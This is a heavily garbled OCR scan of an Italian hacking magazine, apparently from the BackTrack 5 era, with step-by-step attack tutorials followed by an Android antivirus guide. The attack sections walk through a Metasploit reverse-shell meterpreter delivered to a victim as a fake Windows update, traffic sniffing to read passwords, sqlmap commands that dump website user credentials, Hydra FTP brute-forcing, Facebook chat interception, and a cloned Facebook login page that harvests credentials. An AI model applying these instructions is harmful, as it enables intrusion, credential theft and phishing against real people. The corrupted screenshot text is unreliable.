tware Metasploit, che utilizzerà per controllare anche da remoto 
il sistema della sua vittima. 


\ 


f' ■ tonarne 'opt/f ratnewrork/msf 3 

fv* tot v*«* V-in.ftK; u»iii 


sat oct 22, 2:54 PI 


t 


■ ! i 


. ’ 


= f i,«litoti V4.U.0 nrlcose - 

• -*1 e*p ini t*. Ibi «ixiltary M po»r' 

■ - 22B (:4y:o,t:|\ 27 <\"iroi»crs 8 nops 

'1 ivn fU4*J .iprtnlrr I 2411 M «Il 

'irci Ibis copy et tne MKasptotl rmnrwvh voi*, lati up<JntS*.... 

Wd rrr.orrMi'i that you updùte tlie fivMihtnrk al to««r every otwr dny. 
ro? rjifentatiw on ’jpnattitg yem copy al Hrr.isjrtoil, uVwwe *ec: 


riottosi on upnating yom copy al H*M.tspt«l 
t ‘P l* 7 - ... 


t > use exploltymiHi/lwvMltri 


i p.iyliuid wirdows/iMtcrpretcr/rcN'erso tep 



- root^root: i’opt'fram«wo«1(.>m»f3 

;0lo Cd't VI4W Kfm.p^J idelD 


Ibis copy of thè flctasplo:: Fr. a tou t rk wn*. tasi uptbtied 
ne i iKotomil thot you vpdate thè every ut tifi day 

►or inrmn.il ini» no ijpdattnq yo'i' copy of »•«•'« »W; 

Hitps:/ /iun.11 ily rapid7,i otu doryFTWT'1306 


Ktl > use exploit/twltl/tiamtler 

Zil exploit( ìi:w;:. . ) * set paylMM Mtfldote-./«etecpiy*ter/»ei»pp,n tep 

ir)vln.id *> wipckyofs/iiciorprcter/revcr».!: tipi 

►*» Mptoil(t>-.nrt\or) » set thost 192.Ì68.1M.L 

Ihucl rv 1 B. 1 W.|;< | 

•>t t*«|>'.il (: V; : > sol hm»; «444 


( Marufler talleri co bind tei 192.>88.114.1: 
1*1 Storte» reverse hahO’.er on 0.0.8.0:4444 
f*l si.irtincj ihe payload handUr... 

It*t i-.mifirtg jt.if;c irtJlZB hyt-«; te ii2.ir.li. 


a i Ecco la noria d’accesso 

0 \ Il pirata lancia prima il comando use exploit/multi/han- 
dlere poi set payload windows/meterpreter/reverse_ 
tep . Indica l’indirizzo IP della vittima con setlhost{ nel caso in 
esempio, 192.168.114.1) e la porta configurata in precedenza 
(Passo C3) con set Iport 4444. 


* Traguardo raggiunto! 

4 J II pirata dà il comando exploit e attende che la vittima 
avvìi il file msf.exe , magari facendole credere che si tratti 
di un update di Windows. Non appena il pesce avrà abbocca¬ 
to, Metasploit restituirà un messaggio di conferma e avvierà il 
meterpreter creato dal pirata! 



a -. Nel PC della vittima! 

gfll pirata ha ora a disposizione una serie di comandi che 
può usare per controllare da remoto la copia di Windows 
7 installata nel PC del malcapitato. Per scoprirli, digita help. Per 
catturare ad esempio una schermata del desktop, gli basta sem¬ 
plicemente lanciare il comando screenshot. 


i) 


▲ l Pieno controllo 

Può inoltre avviare e gestire il Prompt dei comandi di 
Windows digitando semplicemente il comando execute 
-femd seguito da Invio o addirittura spegnere il PC della vittima 
lanciando il comando shutdown. E non c’è antivirus o firewall 
che tenga: anche Windows 7 è stato bucato! 



SOCIAL 

ENGINEERING 

L'ingegneria sodale è 
un insieme di tecniche 
adottate dai pirati 
informatid (e, più in 
generale, dai truffatori) 
per venire a conoscenza 
delle informazioni 
personali delle loro 
vittime. 


EXPLOIT 

Con questo termine 
si identifica un codice 
che, sfruttando un bug 
o una vulnerabilità 
del sistema operativo 
attaccato, porta all'ac¬ 
quisizione di privilegi di 
amministratore. 


BACKDOOR 

Si tratta di una porta di 
comunicazione aperta 
sul sistema vittima che 
permette di bypassare 
le eventuali protezioni 
attive. 


PAYLOAD 

Letteralmente, carico 
utile. Indica quella 
parte di codice di un 
malware che svolge il 
"lavoro sporco", doè 
le operazioni che 
permettono al virus 
di infettare il sistema 
dell'utente. 


► 
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9 Password e codici di accesso 


Dopo aver ottenuto l’accesso al sistema attaccato, il pirata riesce a catturare tutti i dati in transito sulla nostra 
rete senza fili, per poi analizzarli vedendo in chiaro password e non solo! 



^ Una soia in rete 

■| a In BackTrack il pirata avvia una nuova 
-J sessione del Terminale e digita il coman¬ 
do kismet per avviare il tool di sniffing (analisi del 
traffico) di rete. Alla domanda Start Kismet Server 
risponde Yes e attende qualche secondo affinché 
il software si configuri automaticamente. 


^ Wireless sotto controllo 

2 j Quando viene richiesta l'aggiunta di un’in- 
terfaccia di rete, il pirata conferma con 
Yes e compila il campo Intf con il nome assegna¬ 
to alla scheda senza fili (ad esempio, wlanO) e 
conferma con Add. Per conoscere le interfacce di 
rete digita da Terminale il comando iwconfig. 


± Sniffino in corso 

. 3 1 Kismet è pronto e operativo. Tutti i pac- 
chetti trasmessi ini rete e catturati vengo¬ 
no visualizzati nell’interfaccia grafica principale 
del software. Quando il pirata avrà raggiunto la 
quantità di dati desiderata, può fermare la cattura 
con Disconnect presente nel menu Kismet 


9 In ascolto sulla LAN 


Il nemico potrebbe anche nascondersi aH’intemo della nostra rete locale interna e, utilizzando Wireshark, riuscire 
a sniffare i pacchetti che viaggiano via cavo. Ecco la tecnica utilizzata. 


'y Ai tifi .i 
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il tool giusto 

■J I II pirata raggiunge la voce Wireshark dal 
menu Applications/BackTrack/Informa- 
tion Gathering/Network Analysis/Network Traf- 
ficAnalysis. Avvia quindi il software verificando di 
essere in possesso dei privilegi di amministratore e 
clicca su List thè available capute intertaces. 



a Ecco i pacchetti! 

2 Sceglie fra ethO o wlanO e avvia il processo 
wi cliccando Start. Lo sniffing ha inizio: tutti i 
pacchetti in transito vengono visualizzati nell’in¬ 
terfaccia principale di Wireshark. Quando il pirata 
avrà raggiunto il suo obiettivo, ferma il processo 
cliccando Stop thè running live capture. 


* | È tutto memorizzato 

3 i A questo punto il pirata si sposta nel menu 
File e seleziona l'opzione Save per salva¬ 
re una copia di tutti i pacchetti catturati. Indica un 
nome ed una directory di destinazione e termina 
con un clic sul pulsante Save. Può quindi chiude¬ 
re Wireshark. 
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a Inizia l’analisi dei dati 


Dopo aver sniffato il traffico di rete, per il pirata è giunto il momento di “tradurre” tutti i pacchetti 
criptati. Ecco come e cosa fa per leggere in chiaro e-mail, messaggi di Chat e cronologia Web. 


v> éfaatfoni *!•»<** Syitcft pH 


rootrif root: 


| pie Edlt VtW jsrmin#' Help 

plm5 aìrcMly crihbtoct 
nnb’.'Mj itomi c rswritc 

:<in 7ctf/intt.f|/aDathe? restort' to activùTC n^VTWì♦»<^^J(aTlon• 

|fnubi)ni *.'tr Un i*—* * 

imi '/etc/lnlt .d/upai lu-2 rtloml io <ici tvolrrTrir’óòn^Tìj'jjajaìaii! 
ipacncj. Coniò noe reliably dei •virine Uh? vcrv«r s^i*»ttv qo* 

'S"iq 127.0.1.1 for serve inane 
ittpó noi ruonlng, Irylng to nUiH 
| * MmblUnj additional ex*<iif.»btr. binurv fonte!; biniti ; 

Irooi 

l ♦ st.wtuii} XpUto offlt'io ned* 
j Frror, ApnchcJ not rumlryj 

■ Ì>iB» 0i jr.Y c !/ ■ ' 
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WfW TfKi: /.|mkI>k? korver St&rto-J: 

Vou wall naia la «tra u .TonjaUv. 


S.il OlI tì, V24 PM X 
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- a L’interprete dei dati 

■f | Per rendere leggibili i dati sniffali dalla rete, il pirata usa 
'■mmm# il tool Xplico. Per avviare la comoda interfaccia Web di 
gestione, raggiunge la voce xplico web gui presente nel menu 
Applications/ BackTrack/Information Gathering/Network 
Analysis/Network Traffic Analysis. 


Xplico è operativo 

2 i A questo punto, il pirata apre una nuova scheda del Ter- 
minale e avvia Xplico lanciando il comando /etc/init.d/ 
xplico start seguito da Invio. Attende qualche secondo affinché 
il servizio venga correttamente eseguito e avvia il browser senza 
chiudere la finestra del Terminale. 




5*Oct22, 5 32 FU X. 

Xplico ...Uxerx:.. ■ Mozilla Firefox 



File fttl Vipjv Hijjló'y Borie» arte -Jote 




man + 



im,)> Boffcr.;.!/'» Só-.jiTity OéXiX'UtOB %/Ortrxk-t^ 33«ORG.wg jjMuiic » 




Xplico Interface 

ionio licervi*-'. 



Please logln 

Ut«rn»m< 

xplico 

Password 


ApplinHiron Pierri Sysn.-m •*“] 

Sèt Ort 22. 5:3? Pf-’ X. 

- Xplico ,.:Polt:.. - Mozilla Firefox 

Eòli MiRtory pciotti-atti) Ipni: Help 




Xplico Interface 

Help Forum Wifci Ci 


DATA ACOUISITION 

O UploAding PCAP captare file/s O Live nrqulsltion 


Case riama 
Raccheto catturali 
ExterrwM r 




TiTrp 


a Accesso in corso 

3 ì II pirata digita http://localhost:9876 nella barra indiriz- 
zi di Firefox (preinstallato in BackTrack). Nell'interfaccia 
Web di Xplico decide di autenticarsi usando xplico come User- 
namee xplico come Password. Non gli rimane altro da fare che 
confermare con un clic su Login. 


a Un caso da analizzare 

4 | Appare quindi il menu principale dell'interfaccia Web di 
Xplico. Il pirata clicca sul pulsante New Case e, nella 
sezione Data Acquisition, sceglie l’opzione Uploading PCAP 
capute file/s. Assegna un nome al caso da analizzare e confer¬ 
ma la sua creazione con un clic su Create 




UNOSNIFFER 

ALTERNATIVO 


Finora abbiamo visto 
come il pirata utilizza 
strumenti del calibro di 
Kismet o Wireshark per 
sniffare tutto il traffico 
in transito su una rete. 

Tali software, grazie ai- 

la presenza di un'inter¬ 
faccia grafica risultano 
alquanto semplici ed 
intuitivi. Ma, come al 
solito esiste qualcosa 
di alternativo che 
funziona direttamente 
da linea di comando. 
Stiamo parlando di 
Tcpdump, un ottimo 
snifferanch'esso inte¬ 
grato in BackTrack 5 
RI e comunque instal¬ 
labile su tutte le altre 
distribuzioni Linux. 
Nonostante sia privo di 
interfaccia grafica.il 
suo utilizzo è veramen¬ 
te semplice: al pirata 
basta infatti lanciare 
da Ferm/na/e il coman¬ 
do tcpdump per avviare 

10 snifferche catturerà 
dunque tutto ciò che è 
in transito sull'interfac¬ 
cia ethO. Per affinare la 
sua opera, utilizzando 
magari (Interfaccia Uh 
Fi, il pirata scopre una 
completa lista delle 
opzioni disponibili con 

11 comando tcpdump 
■heip. 


-a Una nuova sessione 

g | Il pirata seleziona il caso appena creato e clicca sul pul- 
«s 5 sante New Session presente nel menu a lato dell'inter¬ 
faccia Web di Xplico. Fornisce un nome al processo (ad esem¬ 
pio, decodifica) e conferma con un clic su Create Fatto quest: 
accede alla sessione appena creata. 


aì I dati sono in chiaro! 


0 ! Il pirata si sposta in Pcap sete preme Browse per cari- 
'*mmf care l'output restituito da Wireshark o Kismet. Conferma 
con Uploade attende che i pacchetti vengano decodificati. Ogni 
tipologia di dato acquisito viene inserito nella relativa categoria 
\Mail. Web, Chat, VOIPecc.). 


► 
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□ Siti Web sotto assedio 


Siamo sicuri che i nostri bloa creati con Joomla e Wordpress siano 
I elenco degli utenti registrati con le relative password di accesso. 


al sicuro? Ecco come 


un pirata riesce ad ottenere 



*** Un tool tuttofare 

■f Applications, il pirata si sposta in BackTrack/Exploitation Tools/ 
^ Web Exploitation TooJse avvia il programma sqlmap Ricerca poi sul 
Web il bersaglio da attaccare accedendo ad una pagina interna del sito il cui 
indirizzo abbia una sintassi del tipo ".php?id=". 


'V 


Clange desktop appearance and 
behavior, gel help, or log out 


Sun Oct 23, 7:55 AW J 


rooti.groot: /pentest/databaie/sqlmap 


cd /pentest/dalabase/sqlmap/ 

; /pentest /da»abase/sqtmapx python 
' : -0 v tablcs 


sqlmap.py 


tqlHp/l.e-dn Irltmi MitoMlic SOI injeclion and da«rl!S;.t tal» 
http://sqlMp.sourceforge.net 


1 11(Legai Disclaimer: utage of sqlmap for nttackimj w*b servers wit 
lual tonscnt C«n I* considered as an ltlegni activity .t is thè fi 
■sponsibiUty to obey all applicatile locai, state and federai law* , 
■n rw Uabillty and are not 
■rogra», 


sponsiblc for any misuse or dnmaqe causcd by thìs pi 


I*) start mg 


*47:59720 



^ Ecco i database 

2 ;; 11 P |ra * a digita quindi nel Terminale il comando python sqlmap.py 
w/ -u URL_ bersaglio —dbs seguito da Invio per ricercare l’elenco dei 
database che compongono il sito Web. L’operazione dura diversi minuti ed è 
fortemente legata alla grandezza del bersaglio prescelto. 



Application* pi .'ì"- System 


Sun Oct 23 , 8:04 AM 


Y * rooti^iroot: /pentmtt/database/aqlmap 

3 fcde pdit iiew ]ferm<n*> yeip 

|I97:58:201 (INFO] thè back-end 0NM5 u WySQl 

Iwen application technoloqy: Apache 1.3.42, PHP 4 4 7 <a * , **hm 

■back end 08MS: MySQL < b.u.ft -—.""""l 

1:87:58:29] IERR04) vo format io» schema noi avallatile, back a<wr5ftMS i*. W.p) 


Ido you want to use comaon tabi* existence check/ [r/n/qj y 
[07:58:591 (INFOI iher.king tabld existeoce usino items from '/pentetì/datóbasr/s 
qlMp/txt/roimr.or* tables.txt' 

107:58:59) (INI-O) udrttnq words used on web page to thè check Vi*t 

please enior ntMiher of threads? Ifriter for 1 (correnti! 1 

lfitlilj.il. |KMmmo| tuwmg li. couLd tafcc a »nrit. 


^ Le tabelle con i dati 

3 I Ma il pirata può andare anche più a fondo, scoprendo quali tabelle 
compongono il database. Per farlo, lancia il comando python sqlmap. 
py -u URL bersaglio -D Nome_Database -tables. Anche in questo caso la 
durata del processo dipende dalla grandezza del database. 


Sun Ort 23 , 8 08 AM £. 


I root:<rroot: /pentest/dAtabasm/sqlmap 

Hit* Hcltt Viow termirs.it Help 

P«rametur 

Fype: boolean-based blind lM| 

TH le: ANO boolean-based blind - mure or HA VINO cloùBfr 
I Payload: id-b AND 2851*2851 -~--- 


■ i 08 ; 00 :ooJ [ittroj «anual us.ige of det payìnads requiii 

Il 08*00-90! IIHfnl th«» P.w k rnrt OOHS 15 MyMM 


. ut Jpencodmg 


1.3 42. PHP 4.4.7 


Iweb application tcchnology: Apache 
Jb.jck end D8MS: MySQL 4 
1^08:O6 :G 8J (ERNORj infonuUon schema not avallatole, back-ertd^BNNìr-t*. ( 


dp-‘Voy,*nifit ■ 
( 08 : Of] : 051 | 
[sql*M 


• cKJcNnwqj ' 


chècfcing còlumn exisienCe itsing jtetns fro» Vpentest/database/ 
fxt/commnr-ccluars.txT * 

—L— • - •_ i i 


***1 Ancora più a fondo 

5 | A questo punto, il pirata digita python sqlmap.py -u URL -bersaglio 
-D Nome_Database -T Nome Tabella -C Nome_Colonna —dump 
per visualizzare in chiaro tutti gli indici di una precisa colonna (ad esempio, 
quella che contiene gli id degli utenti che accedono al sito). 


-*■ Informazioni riservate 

4 | Per il pirata è giunto il momento di scoprire il nome delle colonne 
contenute nelle tabelle appena visualizzate. Per farlo, digita quindi- 
il comando python sqlmap.py -u URL_bersaglio -D Nome Database -T 
Nome_Tabella -columns e attende che sqlmap dia un risultato. 



icaikNv» Fiacri System r> 


StllOcl 23 6:18 AM Jt 


’ * rootSTOot: /pento<tt'daUb,s«/ftqlmAp 

J £tf© gdtt view terminal )idp 

1:98:14:17! lINroj thè bflck-end DBMS is HySOL 

Iwrlt application tnchoology: Apache 1.3,42, 

■back-end DBMS MySQL 4 

|[U8:14:171 fERRORj Information schema not avattSUli», IS MySQL < 


I[88:14:17J (1NI0) fetrhlng coll 
I table 'user 1 on database • :, 


r»(s) ‘useinaiw*.-password, id, 


I;98; 14:17] 11NFQJ fetching number of column's) •uscrnase, p.i&word, id. t iiV’ 
Intries for table 'user' on database ' s-* • 

1(08:14:17! (INFO! read fro* file '/pentest/databas«j/*qlmop/ournut/wwv 
Is.rom/scsMon' : 7 

||08:14:17) IINFOJ retneving thè leogih of query output , 

j -- 9 ' o< 

l.'tìf»-Ì4-171 t iN»r>- ^ -<ai - 


rasfSsMT.. “'*** * 

98:14:17) [INFOj .ttrieVed: sql*wp got a 362 redircct tri ’http:7/www, 
mt io follow redirects from now on <or stay on thè originai piaci? ;V/nl n 

li» • 14 • li! numi .-,1 W.t, '•. i ■ 



I dati di accesso sono qui 

Al pirata non rimane altro da fare che impartire il comando python 
sqlmap.py -u URL_bersaglio -D Nome Database -T Tabella user 


-C Colonna username (oppure Colonna<_ passwd] —dump e visualizzare 
l'elenco completo contenente tutti i dati degli utenti registrati al sito! 
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FILE SYSTEM E SERVER FTP SONO A RISCHIO 


Come abbiamo visto nel Macropasso D, gra¬ 
zie a BackTrack il pirata riesce facilmente ad 
accedere a un sistema remoto. Tra i comandi a 
disposizione del malintenzionato (vedi Passo 
DS), ce ne sono alcuni relativi al controllo del 
file System. Digitando, ad esempio, il comando 
CD, riesce a spostarsi tra le cartelle dell'hard disk 
del malcapitato, mentre con LS ne visualizza 
il contenuto. 

Il software per scardinare l'FTP 

Fra le varie tecniche utilizzate dai pirati per 
entrare in possesso dei nostri file, lo sniffing è 
senza ombra di dubbio quello più completo, 
proprio perché ogni protocollo viene analizzato. 
Ma se l'obiettivo del malintenzionato è quello 
' di scovare i nostri dati di accesso ad un server 
FTP, tutto diviene magicamente più semplice 
e, con un po'dì fortuna, più breve. 

Grazie al software Hydra (anch'esso inte 
grato in BackTrack 5 RI) il pirata riesce a 
sferrare un attacco di tipo brute force 
al server FTP, scoprendo la chiave dì 
accesso di un preciso nome utente. 

Appare evidente però che, almeno 
in questo caso, la lunghezza e la 


difficoltà della password concorrono alla ga 
ranzia di maggiore sicurezza. Tutto sta anche 
alla ricchezza del dizionario utilizzato dal 
Negli attacchi di tipo brute force, infatti, non si 
fa altro che tentare numerose chiavi di accesso 
fino a beccare eventualmente quella corretta. 
Ma, con una breve ricerca sul Web, il pirata è 
in grado di scaricare un dizionario molto ben 
nutrito contenente migliaia se non milioni di 
combinazioni fra lettere e numeri differenti. 
Come si utilizza Hydra? Dopo aver avviato 
Terminale, al pirata non resta che digitare il 
coma ndo hydra -I user nome vittima -p dizio¬ 
nario -f-Vindirizzo server ftp. Il processo ha 
durata variabile ed è fortemente dipendente 
dalla qualità del dizionario e dalla complessità 
della password utilizzata dalla vittima. 


D Chat di Facebook in chiaro 


i nostri dati di accesso al social network non sono gli unici ad essere in pericolo. I pirati sono in grado di leggere 
anche le nostre conversazioni e per farlo devono semplicemente usare uno script pronto all’uso. 



\ , 

pi’cuponi Piti-*- FH 



1 

mlkàtS fflilbilèiMyiikiiiliL 1 ■rilìiHiiJ 



- borogove.py (~) • godlt 

r 


wumr ; acnr, 



t»roi|ove.pv II 

2y- iwssrn*" 


sys.exit 


dof etherjtecodelp): 

return ' .joln(( a %t2M % ordii) tor x in -.trip)]) 


li lenUy i.au 

print 

sys.exit(s) 
plò»"fobar 
pc - pcap.pcapUyi orpvl 1J) 
pc.*«tfUt«r( t<p and port no ) » snitr only http 

try: 

priM Ustening on \ (pc.n«w) 
print to exit, type Control-c 
polionUy». argvl 1 1. sys. argvl 1 J, sys .argv J 3] ) 
for t*. pkt le pc: 

pocket - dpkt.ethemet.Ethernet(pkt) 
pi<J*fbeh&tgrep( pocket ,pld| 


• «topt keyboardjcTerrupt 

__ 



+ Lo script fondamentale 

s Dopo aver awiato BackTrack (Macropas- 
so A), il pirata si collega a Internet e avvia 
il browser Firetox dal menu Applications/lnternet. 
Ricerca quindi direttamente su Google lo script 
borogove.py e ne avvia il download. Decide di 
salvare il file nella Home del sistema. 


^ jì La giusta sintassi 

2 j Al termine del download, il pirata apre il 
file appena scaricato utilizzando un editor 
di testo (ad esempio. Gedit) per scoprirne la sin¬ 
tassi d’uso. Dovrà infatti indicare l'interfaccia uti¬ 
lizzata {Ethernet o Wi-Fi), l’indirizzo IP da colpire 
e il Gateway della LAN. 


^ ; Script in azione! 

3 ! A questo punto, non deve fare altro che 
avviare una nuova sessione del Terminale 
e far partire lo script (nel caso in esempio, python 
borogove.py ethO 192.168.1.12 192.168.1.1). 
Tutte le eventuali conversazioni su Facebook della 
vittima verranno mostrate in chiaro. ► 
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SITE CLONER 


Usando questa opzione 
del programma set, il 
pirata attua un attacco 
di tipo ARP, ovvero 
intercetta le richieste 
di un dient per dirot¬ 
tarle su unaltrohost(in 
questo caso, il suo com¬ 
puter). Cosi facendo, 
riesce a reindirizzare 
la vittima sulla pagina 
di login clonata di Fa¬ 
ce hook. 

' GEDIT 

Si tratta di un editor 
di testo non format¬ 
tato (cioè privo delle 
formattazioni tipiche 
che è possibile aggiun¬ 
gere, ad esempio, con 
Word: allineamento, 
paragrafo, interlinea 
ecc.) integrato in molte 
distribuzioni Linux. 

GATEWAY 

Permette di dirottare i 
pacchetti in arrivo dal 
Web verso la rete inter¬ 
na. Generalmente, il 
suo indirizzo corrispon¬ 
de con NP del router. 
Un pirata che dovesse 
riuscire a prendere il 
controllo delgateway 
riuscirebbe, ovviamen¬ 
te, a monitorare tutto 
il traffico di una rete 
locale. 


B Entrare nel profilo Facebook 

Usando l'ennesimo tool di hacking integrato in BackTrack Linux, il pirata riesce a creare 
una copia delia schermata di accesso ài social network per rubare i nostri dati personali. 
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▲ Attacchi psicologici 

■| : Dopo aver avviato BackTrack (Macropasso A), il pirata 
««J si sposta nella sezione BackTrack del menu Applica¬ 
tions. Da Exploitation Tools/Social Engineering Tools/Social 
Engineering Toolkit apre lo strumento che fa al caso suo: stia¬ 
mo parlando di Set (Macropasso C). 


a L’attacco arriva dai Web 

2 1 Per il pirata è arrivato il momento di scegliere che tipo di 
ita/ attacco sferrare: le opzioni fornite da set sono veramen¬ 
te tante ma, poiché ha deciso di clonare un sito Web, digita 2 
per scegliere un Website Attack 1 /ectors. Prosegue quindi pre¬ 
mendo il tasto Invio. 



* Furto di dati 

3 | Ecco un punto cruciale della sua opera di attacco: il pira- 

.' ta digita 3 e conferma con Invio per scegliere l’opzione 

Credential Harvester Attack Method: così facendo, il clone di 
Facebook sarà in grado di fornire al pirata le credenziali di acces¬ 
so digitate dalla vittima. 



^ La clonazione ha inizio 

^ ! Al pirata non resta che digitare 2 e confermare ancora 
‘■ita/ una volta la scelta premendo Invio. Così facendo, sce¬ 
glierà l’opzione Site Clonerdiset mediante la quale il software 
si occuperà di clonare l'intero contenuto di una pagina Web che 
a breve il pirata indicherà. 



^ Il sito è preso di mira 

§ i A questo punto, set chiede al pirata di immettere l'URL 
del sito Web da clonare. Digita quindi https://www.face- 
book.com e conferma premendo Invio. L’operazione dura diversi 
secondi durante i quali l’intero codice della home page di Face¬ 
book viene scaricato sul PC. 


j Password in chiaro! 

0 ! Qualsiasi computer connesso alla rete locale che tenta 
-•ta f di accedere a Facebook visualizza quindi il clone appena 
creato dal pirata. Ma la vittima, ignara di tutto, digita i suoi dati 
di accesso per la gioia del pirata che li vede in chiaro diretta- 
mente sul Terminale. ■ 
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V Ti spio da PC 


SMS e APP azzera credito | 


I nuovi virus entrano nel telefonino e ti prosciugano 

la ricarica. Ecco l’app giusta per mettersi al sicuro 


SMS e app 
“azzera credilo” 


Cosa ci 
occorre 

SOFTWARE ANTMRUS : 
PER DISPOSITIVI 
ANDROID 

ANTMRUS AVG 
«MWiliiW) 

Sito Internet: httpsV/ 
market.android.com 


L I incredibile diffusione dei nuovi sistemi 
^ operativi mobile, A ndroid primo fra tutti, 
I ha fatto sì che i pi rati perfezionassero le 
loro conoscenze in modo da creare nuovi virus 
da diffondere poi su i moderni smartphone, lìd 
è così che il nostro fedele telefonino potrebbe 
essere magari già infetto comunicando ogni 


nostra mossa al pirata di turno che addirittura 
arriverebbe rubare tutte le password che digi¬ 
tiamo. Come è possibile difendersi? Sul Market 
è possiamo trovare decinedi software antivirus 
a pagamento e non che svolgono egregiamente 
il loro lavoro. Fra questi AVG sembra essere il 
più completo: non solo offre una protezione 


a 360 gradi contro virus, malware o tentativi 
di phishing, ma è anche in grado di impedire 
l'accesso non autorizzato ad alcune delle appli¬ 
cazioni installate su 1 nostro telefonino. Cos’altro 
aspettiamo? Vediamo subito come installarlo 
ed effettuiamo una scansione approfondita del 
nostro telefonino Android. 


* ..li “ 16:16 


□ 


Antivirus AVG gratuito 

AVG MOBILATION 


Accetta e scarica 


AUTORIZZAZIONI 


I tuoi messaggi 

Lettura SMS o MMS, modifica SMS o 
MMS, ricezione SMS 


Tanti renali 

sul market 

B Verifichiamo, 

: innanzitutto, che 
il nostro telefo¬ 
nino Android sia connes¬ 
so ad Internet. Quindi, 
accediamo al Market 
tappando sulla relativa 
icona. Dalla pagina prin¬ 
cipale, ricerchiamo l’app 
gratuita Antivirus AVG 
scrivendone il nome nel 
campo di ricerca. Tap¬ 
piamo quindi sul pulsan¬ 
te Scarica e successi¬ 
vamente confermiamo 
con Accetta e scarica. 



& ^ £ ..il (« 1»:1» 

AVG Mobilation Antivirus 


Antlvirus protegge il dispositivo 
in tempo reale 

Verifica le condizioni dei servizio 


Installazione 

dell’app 


|Terminata la pro¬ 
cedura di downlo¬ 
ad e installazione 
(che dura solo pochi secon¬ 
di, ma dipende comunque 
dalla qualità del segnale 
Internet dello smartphone) 
ricerchiamo nel menu prin¬ 
cipale del nostro smart¬ 
phone l'applicazione appe¬ 
na installata e avviamola. 
Prendiamo visione delle 
condizioni d'uso del sof¬ 
tware e confermiamo con 
un semplice tap sul pul¬ 
sante Accetto. 



Scansione 

in corso 

Così facendo, 
apparirà l’inter¬ 
faccia grafica 
principale di AVG Anti¬ 
virus. Tappiamo sem¬ 
plicemente un punto 
qualsiasi dello schermo 
per avviare una prima 
scansione della memo¬ 
ria del telefonino. La 
durata dell’operazione 
dipende, ovviamente, 
dalla quantità di dati 
presenti nella memoria 
interna ed esterna del¬ 
lo smartphone. 


o Scansione... 

scansione contenuto 


Annulla 



Via le minacce! 

a Terminata la 
procedura di 
scansione del¬ 
la memoria, AVG Anti¬ 
virus ci mostra un qua¬ 
dro riassuntivo delle 
condizioni generali del 
sistema: tutte le even¬ 
tuali minacce individua¬ 
te vengono segnalate 
da una piccola croce 
rossa. Se, ad esempio, 
sono stati rivelati mes¬ 
saggi di posta elettro¬ 
nica con al legati sospet¬ 
ti, tappiamo sul pulsan- 
te Contrassegna. 
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Risultati scansione 


Avviso di sicurezza. Per i 
dettagli, fare clic di seguito 

© Applicazioni 

r-r.7 u - __ 

© «ft Impostazioni 
© Contenuto 


Sono stati rilevati messaggi di testo sospetti. 

Talvolta I messaggi di testo sono utilizzati 
-. .... »,. 
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SMS e APP azzera credito 


Ti spio da PC^ 


Strumenti 



♦♦ ..Il (« 16:1» 

* 


Disattivazione di attività 

Chiudi applicazioni inutilizzate 

Blocco di applicazioni - Prova 

Proteggi te applicazioni con una 
password scade tra 14 giorni 

Messa a punto - Beta 

MHsa n punto Beta 

Backup applicazioni - Prova 

Bàctóo applicazioni tnstaliats '.‘cade Uà 
«pomi IzViàr 


Hi-Cancella dati personali - Beta 


m 

W 


Diritti 
al sodo 

Torniamo 
all'inter¬ 
faccia prin¬ 
cipale di AVGAnti- 
virus premendo il 
pulsante Indietro 
del telefonino. Pre¬ 
miamo il tasto Menzv 
e spostiamoci in 
Strumenti: sele¬ 
zioniamo Scanner 
di file per effet¬ 
tuare una scan¬ 
sione approfondi¬ 
ta di uno o più 
elementi presenti 
in memoria. 




Scansione 

approfondita 

a Dal menu a 
tendina che 
appare, indi¬ 
chiamo la directory 
da scansionare e suc¬ 
cessivamente sele¬ 
zioniamo con un sem¬ 
plice tap i file che 
riteniamo sospetti e 
pericolosi. Avviamo 
quindi il processo di 
scansione della memo¬ 
ria con un tap sul 
pulsante Scansione 
e attendiamo pazien¬ 
ti che ci venga comu¬ 
nicato il verdetto. 


Aggiornamenti 

automatici 

a RitorniamoaH'in- 
terfaccia prin¬ 
cipale di AVG 
Antivirus, premiamo il 
tasto Menu del nostro 
telefonino e, nella nuo¬ 
va schermata che appa¬ 
re, tappiamo sulla voce 
Impostazioni. Selezio¬ 
niamo quindi l'opzione 
Frequenza di aggior- 
namentoe scegliamo il 
valore Una volta a set¬ 
timana. Il software si 
aggiornerà automatica- 
mente allo scadere di 
ogni settimana. 



AVG avvia 

iFcontrollo 

da solo! 


Sempre nel 
menu Impo¬ 
stazioni 
tappiamo sulla voce 
Frequenza scan¬ 
sione automatica 
e selezioniamo l'op¬ 
zione Una volta al 
giorno. Così facen¬ 
do AVG eseguirà 
quotidianamente 
un controllo auto¬ 
matico dell'intero 
sistema e ci infor¬ 
merà di eventuali 
minacce. 



Scansione messaggi di 
testo 

IdendKcs messaggi di leale 


ò 1 $. 
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’W Impostazioni 

4 * 


Frequenza di aggiornamento 

Seleziona frequenza di aggiornamento 


Scanner in tempo reale 

Monitore II dispositivo in 
tempo reale 


Navigazione Internet 
sicura : ; r. 

fcnv.ga ih.interne!iti tutta 

• 



Navigare 

protetti 

Scorrendo 
verso il bas¬ 
so il menu 
Impostazioni, rag¬ 
giungiamo la voce 
Navigazione Inter¬ 
net sicura. Mùm¬ 
mia tappandoci 
sopra così da navi¬ 
gare più sicuri, cer¬ 
ti che AVG Antivirus 
sta attentamente 
vigilando su tutte 
le pagine aperte dal 
browser. Possiamo 
quindi tornare alìi- 
terfaccia principa 
le dell’app. 


Ball n „.l « 16:26 

"* Blocco di applicazioni 4* 


Per iniziare a utilizzare Blocco di 
applicazioni è necessario impostare 
una password. 


Password: 


Ridigitare la password: 


Digitare l'e-mail per il recupero 
della password (opzionale): 

vincosentino@gmail.com 



Applicazioni 

protette da 

password! 

Premiamo il 
tasto Menu 
sul nostro tele- 
e, nella nuova 
schermata che appa¬ 
re, tappiamo sulla voce 
Strumenti. Selezio¬ 
niamo quindi l’opzione 
Blocco di applicazio¬ 
ni ed inseriamo una 
password a nostra 
scelta e confermiamo 
con OK. Indichiamo 
quindi le applicazioni 
da proteggere e con¬ 
fermiamo con Salva 
ed esci. 


S9 

fonino 



SICURI ANCHE IN 
CASO DI FURTO 

AVG integra un sistema di 
controllo remoto del te¬ 
lefonino che, se attivato, 
consente di individuare 
la sua reale posizione. 

Per attivarlo avviamo 
l'app, premiamo il tasto 
Menu del telefonino e 
spostiamoci in Remoto. 
Tappiamo quindi su Regi¬ 
strazione e confermiamo 
il nostro indirizzo e-mail. 
Abilitiamo poi l'opzione 
Servizio di identificazio¬ 


ne. Da questo momento 
